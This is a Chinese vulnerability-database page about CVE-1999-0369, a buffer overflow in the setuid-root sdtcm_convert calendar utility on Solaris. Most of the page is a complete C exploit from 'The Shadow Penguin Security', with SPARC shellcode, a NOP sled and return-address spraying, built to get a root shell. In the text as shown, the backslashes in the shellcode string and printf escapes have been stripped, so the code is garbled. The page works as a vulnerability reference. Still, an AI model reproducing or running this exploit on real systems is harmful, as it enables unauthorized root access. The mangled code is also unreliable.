OpenWindows Sun sdtcm_convert日历实用程序权限许可和访问控制漏洞-安全小百科

OpenWindows Sun sdtcm_convert日历实用程序权限许可和访问控制漏洞

漏洞ID	1105382	漏洞类型	缓冲区溢出
发布时间	1998-10-23	更新时间	2005-05-02
CVE编号	CVE-1999-0369	CNNVD-ID	CNNVD-199702-001
漏洞平台	Solaris	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/19128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199702-001

|漏洞详情

OpenWindowsSun的sdtcm_convert日历实用程序存在缓冲区溢出漏洞。可以利用该漏洞访问根目录。

|漏洞EXP

/*
source: http://www.securityfocus.com/bid/166/info

Sdtcm_convert is a setuid-root data conversion utility which converts OpenWindows version 3 calendar data files to version 4 and vice versa. A buffer overflow condition has been found in sdtcm_convert which may be exploited to obtain root access.
*/

/*=============================================================================
   sdtcm_convert Overflow Exploits( for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN ([email protected])
 
   [usage]
        % gcc ex_sdtcm_convert.c (This example program)
        % a.out
        If no response, hit ctrl+c
        #

=============================================================================
*/

#define     ADJUST      2
#define     OFFSET1     4000
#define     LENGTH1     260
#define     OFFSET2     6000
#define     LENGTH2     1000
#define     OFFSET3     6000+16*30

#define NOP 0xa61cc013

char exploit_code[] =
"x82x10x20x17x91xd0x20x08"  
"x82x10x20xcaxa6x1cxc0x13x90x0cxc0x13x92x0cxc0x13"
"xa6x04xe0x01x91xd4xffxffx2dx0bxd8x9axacx15xa1x6e"
"x2fx0bxdcxdax90x0bx80x0ex92x03xa0x08x94x1ax80x0a"
"x9cx03xa0x10xecx3bxbfxf0xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd4xffxff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}
 
unsigned long ret_adr;
int i;
 
main()
{
    static char x[11000];

    memset(x,'a',10000);
    ret_adr=get_sp()-6300;
    for (i = 0; i < 5000 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    ret_adr=get_sp() - 10200;
    if ((ret_adr & 0xff )==0) ret_adr+=4;
    printf("%lxn",ret_adr);
    for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
        x[i+3]=NOP & 0xff;  
        x[i+2]=(NOP >> 8 ) &0xff; 
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0;i<strlen(exploit_code);i++)
x[OFFSET3+ADJUST+i]=exploit_code[i];
    x[10000]=0;
    execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert",
"-d",x,"test",(char *) 0);
}

|参考资料

来源:SUN
名称:00183
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/183

相关推荐: SafeBoot User Enumeration Weakness

SafeBoot User Enumeration Weakness 漏洞ID 1100645 漏洞类型 Design Error 发布时间 2003-03-20 更新时间 2003-03-20 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A …

文章版权归作者所有，未经允许请勿转载。

THE END